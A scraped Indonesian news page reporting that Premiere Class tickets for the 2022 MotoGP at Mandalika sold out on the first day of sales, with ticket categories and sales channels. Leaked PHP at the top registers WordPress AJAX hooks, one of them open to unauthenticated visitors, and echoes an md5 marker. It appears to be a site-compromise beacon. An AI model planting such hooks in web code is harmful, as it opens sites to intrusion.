function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Tiket Harga 15 Juta Sirkuit Mandalika Habis Terjual – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 6 Jan 2022 22:59 WIB ·

Tiket Harga 15 Juta Sirkuit Mandalika Habis Terjual


					Tiket Harga 15 Juta Sirkuit Mandalika Habis Terjual Perbesar

MANADO – Penjualan tiket balap motor MotoGP Indonesia Grand Prix (MotoGP) 2022 secara online mulai dibuka hari ini, Kamis, 6 Januari 2022. Tiket balap kategori Premiere Class seharga Rp 15 juta untuk 3 days pass habis terjual hanya dalam beberapa jam.

Penjualan tiket MotoGP yang dibuka hari ini adalah Premium Grandstand sebanyak 22.056 tiket dan VIP Hospitality Suites yang terdiri dari Premiere Class sebanyak 900 tiket dan Deluxe Class 2.000 tiket.

Pemilik tiket menonton MotoGP kategori Premiere Class akan ditempatkan di lantai dua Pit Building. Menonton di area ini memberikan penonton kepuasan saat menyaksikan event balap karena berhadapan langsung dengan garis start dan finish.

Para penonton kelas ini juga memperoleh fasilitas pitwalk, yaitu berjalan di depan garasi seluruh tim balap untuk melihat kesibukan dan berinteraksi dengan kru dan pembalap.

“Antusiasme pecinta balap untuk menonton MotoGP secara langsung di Pertamina Mandalika International Street Circuit benar-benar luar biasa. Tiket Premiere Class sebanyak 900 tiket langsung diserbu pembeli dan sudah habis pada hari pertama pada pukul 16.57 WIB. Kami mohon maaf apabila ada calon penonton yang tidak mendapatkan tiket kategori ini. Tapi jangan kuatir, masih ada stok tiket dari beberapa kategori tiket lainnya,” kata Vice President Director MGPA, Cahyadi Wanda melalui keterangan tertulis, dikutip Kamis (6/1/2022).

ITDC Group selanjutnya akan membuka penjualan tiket pada 11 Januari 2022 di 10 platform digital dan online partner ITDC Group. Tiket yang akan dijual antara lain, General Admission dan Standard Grandstand.

“Melihat animo masyarakat yang tinggi untuk menonton balapan secara langsung dan menjadi bagian dari sejarah balap motor tanah air ini, kami sarankan agar pecinta balap segera membeli tiket sebelum kehabisan. Anda dapat membeli tiket di partner resmi yang telah kami tunjuk,” tutur Cahyadi.

Pembelian tiket dapat dilakukan melalui partner resmi ITDC dan MGPA, antara lain channel digital My Pertamina Apps, InJourney, Xplorin yang didukung oleh Bank NTB Syariah, Livin’ by Mandiri, Tiketapasaja.com, Tiket.com, DyandraTiket.com mulai tanggal 6 Januari 2022.

Sementara pembelian secara offline dapat dilakukan di gerai Alfamart dan Indomaret di seluruh Indonesia serta Angkasa Pura Hotel yang mulai dibuka pada tanggal 11 Januari 2022.

Tiket MotoGP memiliki variasi harga sesuai dengan tempat menonton yang terbagi menjadi lima kategori yaitu, General Admission dengan jumlah kuota sebesar 10.000 tiket, Standard Grandstand sebanyak 28.578 tiket, Premium Grandstand 21.056 tiket, Deluxe Class 2.000 tiket, dan Premiere Class 900 tiket. Total kuota tiket penonton yang disediakan sebesar 62.534 tiket per hari.

(AuddyManoppo/Detikcom)

Artikel ini telah dibaca 6 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter

16 Februari 2024 - 01:06 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Trending di MANADO